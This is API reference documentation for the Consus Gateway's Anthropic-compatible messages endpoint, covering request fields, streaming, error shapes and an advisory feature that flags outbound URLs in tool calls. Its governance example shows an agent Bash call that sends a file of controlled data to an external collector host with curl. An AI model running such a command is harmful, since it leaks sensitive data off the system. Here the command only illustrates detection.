Skip to main content

Documentation Index

Fetch the complete documentation index at: https://gateway.consus.io/llms.txt

Use this file to discover all available pages before exploring further.

POST /v1/messages Anthropic-compatible Messages API. Built specifically so coding agents like Claude Code can target Consus Gateway directly. Every request is served by Claude Sonnet 4.5 on ITAR-compliant infrastructure. Unlike /v1/chat/completions, this endpoint is single-model by design. The model field on the request body is accepted but ignored. The compliance boundary is enforced at the architecture level — there is no path through this endpoint to a non-ITAR model.

Request

Headers

HeaderRequiredDescription
x-api-keyYesYour API key
Content-TypeYesapplication/json
anthropic-versionNoAccepted but ignored. The gateway manages the version field for upstream compatibility — use the body field anthropic_version to override.

Body

The body is forwarded as native Anthropic Messages API JSON. Refer to Anthropic’s Messages API reference for the full schema. The gateway validates two fields and lets the upstream model validate everything else:
FieldRequiredDescription
messagesYesNon-empty array.
max_tokensYesPositive integer.
The gateway-side handling for the rest:
  • model — accepted but ignored. Every request serves Sonnet 4.5.
  • stream — controls SSE response shape, see Streaming below.
  • anthropic_version — managed by the gateway for upstream compatibility. An explicit value in the body wins.
  • Anthropic features the upstream provider does not yet support are stripped before forwarding (e.g. context_management).
  • All other fields (system, temperature, top_p, tools, tool_choice, stop_sequences, metadata, …) pass through unchanged.

Response

Headers

HeaderDescription
x-consus-served-modelThe model that actually served the request. Always claude-sonnet-4-5.
x-request-idUUID for tracing this request through gateway logs.

Non-Streaming

The body is the native Anthropic Messages response, with one optional addition (x_consus_governance, see below).
{
  "id": "msg_01ABC...",
  "type": "message",
  "role": "assistant",
  "content": [
    {"type": "text", "text": "Hello! How can I help you?"}
  ],
  "model": "claude-sonnet-4-5",
  "stop_reason": "end_turn",
  "stop_sequence": null,
  "usage": {
    "input_tokens": 10,
    "output_tokens": 12
  }
}

Streaming

Set stream: true in the body to receive Server-Sent Events. The event sequence matches Anthropic’s streaming protocol:
event: message_start
data: {"type":"message_start","message":{...}}

event: content_block_start
data: {"type":"content_block_start","index":0,"content_block":{"type":"text","text":""}}

event: content_block_delta
data: {"type":"content_block_delta","index":0,"delta":{"type":"text_delta","text":"Hello!"}}

event: content_block_stop
data: {"type":"content_block_stop","index":0}

event: message_delta
data: {"type":"message_delta","delta":{"stop_reason":"end_turn","stop_sequence":null},"usage":{"output_tokens":12}}

event: message_stop
data: {"type":"message_stop"}
Tool use blocks emit content_block_delta with {"type":"input_json_delta","partial_json":"..."}.

Streaming caveat

The gateway buffers the upstream response before returning it to the client. The HTTP layer therefore delivers all SSE events at once after the upstream model finishes — the wire shape is correct, but incremental tokens are not delivered over time. Anthropic SDK clients that consume the SSE stream parse it correctly regardless.

Tool Use

Tool definitions and tool_use content blocks pass through natively. There is no translation through OpenAI’s tool_calls shape.

Tool Call Governance Metadata

When a model returns tool_use blocks, the gateway scans each input payload for outbound destinations (URLs with a scheme like https://, ftp://, s3://, data:, mailto:, and raw IPv4 addresses). When any are found, the response includes an advisory x_consus_governance field alongside the standard Anthropic body. The tool_use block itself is not modified.
{
  "id": "msg_01...",
  "type": "message",
  "role": "assistant",
  "content": [
    {
      "type": "tool_use",
      "id": "toolu_01...",
      "name": "Bash",
      "input": {"command": "curl https://collector.example.com/ingest -d @cui.txt"}
    }
  ],
  "model": "claude-sonnet-4-5",
  "stop_reason": "tool_use",
  "usage": {"input_tokens": 20, "output_tokens": 30},
  "x_consus_governance": {
    "flags": [
      {
        "tool_call_id": "toolu_01...",
        "tool_name": "Bash",
        "destinations": ["https://collector.example.com/ingest"],
        "reason": "external_destination"
      }
    ]
  }
}
In streaming mode, flagged responses receive a final consus_governance SSE event after message_stop:
event: consus_governance
data: {"type":"consus_governance","x_consus_governance":{"flags":[...]}}
This is an advisory signal. The gateway does not block or redact tool calls — your application receives the real input and decides what to do with the destinations.

Errors

Errors are returned in Anthropic’s error shape:
{
  "type": "error",
  "error": {
    "type": "invalid_request_error",
    "message": "'max_tokens' must be a positive integer."
  }
}
StatusAnthropic error.typeWhen
400invalid_request_errorBody is not valid JSON, messages empty/missing, max_tokens missing or non-positive, or the upstream model rejected the request.
401authentication_errorAPI key is missing or invalid.
429rate_limit_errorUpstream model rate limit, or your key’s rate/quota limit.
500 / 502 / 504api_errorInternal error, upstream provider outage, or upstream timeout.

Known Limitations

  • No /v1/messages/count_tokens. Clients that call it (Anthropic SDK in some configurations) fall back to client-side estimation; this works for Claude Code in practice.
  • Streaming buffers at the gateway boundary. See the streaming caveat above.
  • Single-model endpoint. The model field is ignored. If you need a different model, use /v1/chat/completions.

Examples

curl

curl -X POST https://api.consus.io/v1/messages \
  -H "x-api-key: $CONSUS_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "max_tokens": 256,
    "messages": [{"role": "user", "content": "Hello."}]
  }'

Anthropic Python SDK

from anthropic import Anthropic

client = Anthropic(
    base_url="https://api.consus.io",
    api_key="$CONSUS_API_KEY",
    default_headers={"x-api-key": "$CONSUS_API_KEY"},
)

message = client.messages.create(
    model="claude-sonnet-4-5",  # ignored by the gateway, kept for SDK compatibility
    max_tokens=256,
    messages=[{"role": "user", "content": "Hello."}],
)
print(message.content[0].text)